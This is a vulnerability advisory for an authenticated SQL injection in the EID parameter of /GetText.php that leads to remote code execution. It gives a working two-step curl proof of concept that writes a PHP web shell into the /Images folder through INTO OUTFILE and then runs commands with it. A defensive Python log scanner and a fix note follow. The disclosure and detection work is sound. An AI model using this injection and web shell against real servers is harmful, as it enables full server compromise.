Summary
The application is vulnerable to RCE through an authenticated SQLi.
Details
The vulnerability allows for SQL injection through the EID parameter in a GET request to /GetText.php. Authentication is required, but no elevated privileges are necessary. This allows attackers to inject SQL statements and output the result of a query with PHP code appended in an arbitrary PHP file in a writable folder served by the application.
Depending on the stack being used to host the application, the malicious file path will vary. This information can be gathered using the SQLi through LOAD_FILE statements.
PoC
To demonstrate the vulnerability, two cURL requests are needed:
- First request to create the malicious PHP file. It is necessary to know the path for the /Images directory:
APP_IMAGES_PATH=<path_to_application_images>; curl "<url>/GetText.php?EID=1%20INTO%20OUTFILE%20%27$APP_IMAGES_PATH/RCE.php%27%20FIELDS%20TERMINATED%20BY%20%27%27%20LINES%20TERMINATED%20BY%20%27%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%27%20--%20-" -H "Cookie: <your_cookie>"
- Second request to execute arbitrary commands through the cmd parameter:
curl "<url>/Images/RCE.php?cmd=sleep+5"
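As an added detection example (not part of the advisory), a Python scan over constructed web-server access-log lines that flags the two traces the PoC above leaves behind: a non-integer EID value on /GetText.php (checked for the INTO OUTFILE / LOAD_FILE keywords the report relies on) and a request for a .php file under the /Images directory. The combined log format, the sample addresses and the /var/www/html web root are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (Apache/nginx combined format assumed). Line 2 is
# the advisory's first PoC request with /var/www/html assumed as web root;
# line 3 is the follow-up hit on the dropped file; lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /GetText.php?EID=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /GetText.php?EID=1%20INTO%20OUTFILE%20%27/var/www/html/Images/RCE.php%27%20FIELDS%20TERMINATED%20BY%20%27%27%20LINES%20TERMINATED%20BY%20%27%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%27%20--%20- HTTP/1.1" 200 12
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /Images/RCE.php?cmd=sleep+5 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Images/logo.png HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# File-system-touching SQL the advisory uses: OUTFILE to write, LOAD_FILE to locate paths.
FILE_SQL = re.compile(r"\b(INTO\s+OUTFILE|INTO\s+DUMPFILE|LOAD_FILE)\b", re.I)


def classify(line):
    """Return an alert dict for one log line, or None when it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    if path == "/gettext.php":
        # parse_qs percent-decodes, so the SQL text is inspected as the server sees it
        eid = parse_qs(url.query).get("EID", [""])[0]
        if eid.strip().isdigit():
            return None
        reason = "sqli-file-write" if FILE_SQL.search(eid) else "eid-not-integer"
        return {"ip": m.group("ip"), "ts": m.group("ts"), "reason": reason, "eid": eid}
    if path.startswith("/images/") and path.endswith(".php"):
        # /Images is a static image folder; a PHP file there is the dropped web shell
        return {"ip": m.group("ip"), "ts": m.group("ts"), "reason": "php-under-images", "path": url.path}
    return None


def scan(log_text):
    """Run classify() over every line and return the alerts in log order."""
    return [a for a in (classify(l) for l in log_text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The scan only evidences the two PoC steps after the fact; the fix is to bind EID as an integer parameter in /GetText.php so the value never reaches the SQL text.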
Impact
This vulnerability allows remote code execution (RCE) on the server to authenticated users. Attackers can inject and execute arbitrary PHP code by appending it to query results, potentially leading to complete compromise of the application and server.